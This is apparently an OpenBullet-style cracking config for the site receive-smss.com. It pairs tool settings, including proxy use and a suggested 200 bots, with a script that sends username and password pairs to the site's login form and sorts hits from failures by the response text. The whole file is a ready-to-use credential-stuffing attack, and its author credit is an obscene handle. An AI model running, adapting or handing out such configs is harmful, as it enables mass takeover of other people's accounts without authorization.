[SETTINGS]
{
  "Name": "receive-smss.com",
  "SuggestedBots": 200,
  "MaxCPM": 0,
  "LastModified": "2022-04-04T22:40:25.4322206+00:00",
  "AdditionalInfo": "",
  "Author": "@YOUR_MOTHER_FUCKER_BITCH",
  "Version": "1.4.4 [Anomaly]",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "Contour": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "Crop": false,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#@YOUR_MOTHER_FUCKER_BITCH REQUEST POST "https://receive-smss.com/login/" 
  CONTENT "log=<USER>&pwd=<PASS>&wp-submit=Sign+In+Now&redirect_to=%2F&instance=&action=login" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: receive-smss.com" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" 
  HEADER "Accept-Language: en-US,en;q=0.5" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Content-Type: application/x-www-form-urlencoded" 
  HEADER "Content-Length: 85" 
  HEADER "Origin: https://receive-smss.com" 
  HEADER "Alt-Used: receive-smss.com" 
  HEADER "Connection: keep-alive" 
  HEADER "Referer: https://receive-smss.com/login/" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "TE: trailers" 

#@YOUR_MOTHER_FUCKER_BITCH KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "The password you entered for the username dasdsa is incorrect." 
    KEY "The password you entered for the email address " 
  KEYCHAIN Success OR 
    KEY "Logout" 

#@YOUR_MOTHER_FUCKER_BITCH FUNCTION Constant "@YOUR_MOTHER_FUCKER_BITCH" -> VAR "CONFIG BY:" 

